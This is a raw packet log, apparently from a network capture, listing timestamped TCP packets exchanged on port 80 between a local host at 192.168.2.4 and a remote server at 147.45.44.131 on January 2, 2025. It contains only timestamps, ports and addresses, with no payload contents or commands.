Jan 2, 2025 19:13:03.906724930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906734943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906744003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906754017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906763077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906769991 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906774998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906785011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906795025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906800032 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906805038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906812906 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906816959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906827927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906838894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906840086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906840086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906843901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906855106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.906883955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906922102 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.907497883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907515049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907520056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907529116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907540083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907550097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907558918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.907560110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907569885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907578945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907589912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.907591105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.907591105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.907632113 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990185022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990199089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990272999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990309000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990319967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990330935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990341902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990350962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990361929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990401983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990401983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990431070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990447044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990463018 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990473986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990483046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990493059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990499020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990514994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990557909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990597963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990609884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990618944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990628004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990665913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990665913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990744114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990875959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990885019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990895033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990905046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990916967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990931034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.990940094 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.990992069 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991015911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991025925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991035938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991046906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991058111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991065025 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991110086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991110086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991184950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991197109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991206884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991216898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991229057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991244078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991244078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991334915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991345882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991355896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991367102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991377115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991384983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991388083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991434097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991434097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991499901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991517067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991528034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991537094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991548061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991558075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991569042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991579056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991585016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991585016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991585016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991595984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991606951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991616964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991626978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991640091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991640091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991645098 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991656065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991663933 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991667032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991676092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991677046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991688967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991698980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991713047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991713047 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991729021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991739988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991745949 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991750002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991755962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991760969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991770983 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991770983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991780996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991791010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991801023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991811037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991820097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991827011 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991827011 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991831064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991842031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991842031 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991852999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991862059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991866112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991866112 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991873026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.991895914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.991924047 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995176077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995243073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995253086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995263100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995304108 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995321035 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995358944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995523930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995534897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995544910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995554924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995565891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995575905 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995582104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995582104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995587111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995596886 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995606899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995618105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995628119 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995628119 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995629072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995671034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995681047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995687008 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995687008 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995691061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995744944 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995757103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995793104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995804071 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995809078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995853901 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.995920897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995932102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995942116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995951891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995963097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995971918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.995974064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996002913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996002913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996083021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996093035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996105909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996131897 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996241093 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996252060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996262074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996272087 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996283054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996294022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996295929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996304989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996315002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996324062 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996324062 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996330023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996339083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996349096 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996359110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996360064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996360064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996412039 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996581078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996592045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996608019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996618032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996629000 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996639967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.996639967 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996670961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.996670961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077223063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077234030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077243090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077253103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077334881 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077342987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077399015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077518940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077531099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077539921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077549934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077575922 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077575922 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077678919 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077687979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077697039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077706099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077714920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077723980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077737093 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077749014 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077775002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077832937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077846050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077855110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077866077 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077882051 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077908039 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.077975035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077985048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.077994108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078001976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078015089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078023911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078032970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078047037 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078047037 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078085899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078155994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078167915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078176975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078186989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078196049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078205109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078213930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078222036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078226089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078226089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078233004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078238964 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078265905 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078330040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078341961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078351021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078382015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.078977108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078986883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078991890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.078996897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079001904 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079010963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079020023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079030037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079054117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079054117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079122066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079133987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079144001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079154968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079164982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079174995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079175949 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079175949 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079185009 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079200983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079204082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079222918 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079247952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079257965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079267979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079291105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079332113 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079416990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079427958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079437971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079447985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079458952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079544067 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079562902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079574108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079582930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079595089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079605103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079615116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079623938 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079636097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079653978 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079653978 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079653978 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079685926 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079687119 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.079695940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079705954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.079742908 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080046892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080127001 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080178976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080343008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080353022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080413103 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080504894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080516100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080549955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:04.080667973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080678940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080688953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080699921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080710888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080720901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080730915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:04.080741882 CET	80	49731	147.45.44.131	192.168.2.4
